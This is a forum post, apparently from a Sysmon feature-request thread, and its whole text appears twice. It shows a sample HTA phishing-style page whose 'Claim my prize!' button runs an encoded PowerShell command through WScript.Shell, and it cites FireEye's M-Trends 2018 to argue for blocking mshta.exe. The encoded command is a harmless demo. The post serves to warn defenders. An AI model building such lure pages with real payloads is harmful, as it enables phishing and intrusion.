Author: GregAskew
Subject: Sysmon Feature Request: Log Source of DCOM Calls
Posted: 14 April 2018 at 5:54pm
It doesn't have to be a downloaded hta. It can be in-line in an html web page or html email.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="host" BORDER="thin" BORDERSTYLE="complex" maximizeButton="yes" minimizeButton="yes" scroll="no"/>
<title>Sample</title>
</head>
<script for="prize" event="onClick" language="VBScript">
Dim notMal
Set notMal = CreateObject("WScript.Shell")
notMal.Run "powershell.exe -e VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="
</script>
<body>
<p>
You're our millionth victim!
</p>
<p>
<form>
<input type="button" value="Claim my prize!"/>
</form>
</p>
</body>
</html>
Allowing mshta.exe to run is a sure-fire way to allow adversaries a foothold in your environment.
Source:
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf
Subject: Sysmon Feature Request: Log Source of DCOM Calls
Posted: 14 April 2018 at 5:54pm
It doesn't have to be a downloaded hta. It can be in-line in an html web page or html email.
<!DOCTYPE html>
<html>
<head>
<HTA:APPLICATION ID="host" BORDER="thin" BORDERSTYLE="complex" maximizeButton="yes" minimizeButton="yes" scroll="no"/>
<title>Sample</title>
</head>
<script for="prize" event="onClick" language="VBScript">
Dim notMal
Set notMal = CreateObject("WScript.Shell")
notMal.Run "powershell.exe -e VwByAGkAdABlAC0ASABvAHMAdAAgACIAUABXAE4ARQBEACIAOwAgAHIAZQBhAGQALQBoAG8AcwB0AA=="
</script>
<body>
<p>
You're our millionth victim!
</p>
<p>
<form>
<input type="button" value="Claim my prize!"/>
</form>
</p>
</body>
</html>
Allowing mshta.exe to run is a sure-fire way to allow adversaries a foothold in your environment.
Source:
https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf